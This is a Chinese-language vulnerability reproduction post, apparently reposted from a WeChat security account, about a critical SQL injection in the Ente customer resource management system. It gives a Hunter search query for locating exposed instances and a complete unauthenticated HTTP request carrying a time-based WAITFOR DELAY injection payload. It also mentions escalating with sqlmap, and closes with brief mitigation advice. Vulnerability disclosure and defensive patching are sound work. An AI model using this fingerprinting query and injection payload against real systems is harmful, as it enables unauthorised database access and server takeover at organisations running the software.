【漏洞复现】浙大恩特客户资源管理系统 SQL注入漏洞

免责声明：该文章仅用于技术讨论与学习。请勿利用文章所提供的相关技术从事非法测试，若利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果均与文章作者及本账号无关。

漏洞名称

浙大恩特客户资源管理系统 SQL注入漏洞

漏洞评分

9.8（严重）

CVSS:3.X /AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

漏洞详情

浙江大学Ente客户资源管理系统T0140_editAction.entweb接口存在SQL注入漏洞。未经身份验证的攻击者可以利用该漏洞获取系统数据库中的敏感信息，深入利用可以获得服务器权限。

影响产品

浙大企业客户资源管理系统

漏洞复现

1.hunter查询语法：web.body="浙大恩特客户资源管理系统"

2.系统登录页面：

3. 注入点

GET /entsoft/T0140_editAction.entweb;.js?method=getdocumentnumFlag&documentnum=1%27;WAITFOR+DELAY+%270:0:5%27%2d%2d HTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9

延迟5秒

Sqlmap获取权限

解决方案

补丁文件

暂无相关数据

其他修复方法

请联系供应商获取安全补丁。

缓解方案

关闭互联网暴露并设置接口访问控制，严格检查用户提交的数据信息，多次过滤

加密用户数据内容，用SQL语句预编译和绑定变量

原文始发于微信公众号（蚁剑安全实验室）：【漏洞复现】浙大恩特客户资源管理系统 SQL注入漏洞